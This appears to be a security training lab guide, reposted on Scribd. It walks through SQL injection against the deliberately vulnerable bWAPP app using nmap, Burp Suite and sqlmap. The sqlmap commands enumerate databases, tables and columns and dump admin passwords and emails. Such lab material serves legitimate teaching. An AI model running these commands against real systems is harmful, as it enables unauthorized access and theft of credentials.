Scribd
Upload
44 views21 pages

SQL Injection Lab Guide with SQLMap

Uploaded by

ajaypalsingh7275
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
44 views21 pages

SQL Injection Lab Guide with SQLMap

Uploaded by

ajaypalsingh7275
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Name SQL Injection with SQLMap

URL [Link]

Type Tools of Trade

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

In this lab exercise, we will take a look at how to use ​SQLMap​ to perform SQL Injection attacks
on the ​bWAPP​ web application.

Objective:​ Perform SQL Injection attack on the web application with SQLMap.

Exploitation:

Step 1:​ Finding the IP address of the Kali machine.

Command: ​ip addr

Step 2:​ Run a nmap scan against the target IP. (Next IP in range)

Command:​ nmap [Link]


Step 3:​ Open Firefox and visit the website. Login into bWAPP using given credentials ​bee:bug ​.

.
Step 4:​ Select “SQL Injection (GET/Search)” from the list and press “Hack” button.

Step 5:​ On the “SQL Injection (GET/Search)” page, type “hello” in the search bar and press the
“Search” button.
Notice the URL, the “hello “ string is being passed as a URL parameter.
Step 6:​ Start Burp Proxy in interception mode and also select “Burp” from FoxyProxy plugin.

Step 7:​ Refresh the page (or again search for “hello”). Intercept the request in the burp proxy
and copy the cookie. This cookie is needed for SQLMap to work.
Step 8:​ Run SQLMap on the target [Link] “title” as the test parameter (input string was
passed as value of title).

Command:​ sqlmap -u "[Link] --cookie


"PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title

SQLMap has found issues with the title parameter and also suggested three payloads (SQL
queries).

Step 9:​ Send captured request to Repeater.


Step 10:​ Copy the first payload and paste it as part of the title parameter. Then send the
request to the server.

Step 11:​ Check the response. It is throwing SQL syntax error.


Step 12:​ Copy the second payload from SQLMap output and paste that in Burp repeater’s
request tab. Send the request.
Step 13:​ Check the response. It is also throwing SQL syntax error.
Step 14:​ Use the sqlmap to get a list of databases present on the database server.

Command:​ sqlmap -u "[Link] --cookie


"PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title --dbs

Step 15:​ Use the sqlmap to get a list of tables for database bWAPP.

Command:​ sqlmap -u "[Link] --cookie


"PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP --tables
Step 16:​ Use the sqlmap to get the list of columns in the users table of bWAPP database.

Command:​ sqlmap -u "[Link] --cookie


"PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP -T users
--columns

Step 17:​ Use the sqlmap to dump password and email for admin from the users table. Press ‘n’
twice when prompted.
Command:​ sqlmap -u "[Link] --cookie
"PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP -T users -C
admin,password,email --dump

Step 18:​ Turn off the intercept mode of the Burp suite.

Step 19:​ Select “SQL Injection (POST/Search)” from the list and press “Hack” button.
Step 20:​ Turn on the intercept mode of the Burp suite again.

Step 21:​ Search for “Hello” from this search page.


Step 22:​ The intercepted request shows that the search string was sent as the value of
parameter title as POST request.
Step 23:​ Copy intercepted request to a file.
Step 24:​ Save the file as “request”.

Step 25:​ Check the content of the request file.

Command:​ cat request


Step 26:​ Run SQLMap with this saved file. Again take “title” as the test parameter.

Command:​ sqlmap -r request -p title

SQLMap suggested three payloads for this one too.

Step 27:​ Send the captured request to Repeater.


Step 28:​ Copy the payload from the SQLMap output and add it to POST data (as part of value
of the title parameter).

Step 29:​ Check the Response. Seems to be an error due to duplicate entry.
Step 30:​ Change the request to pass version() function to the database.
Step 31:​ One can observe the database version information in the response.

References

1. bWAPP (​[Link]
2. sqlmap (​[Link]

You might also like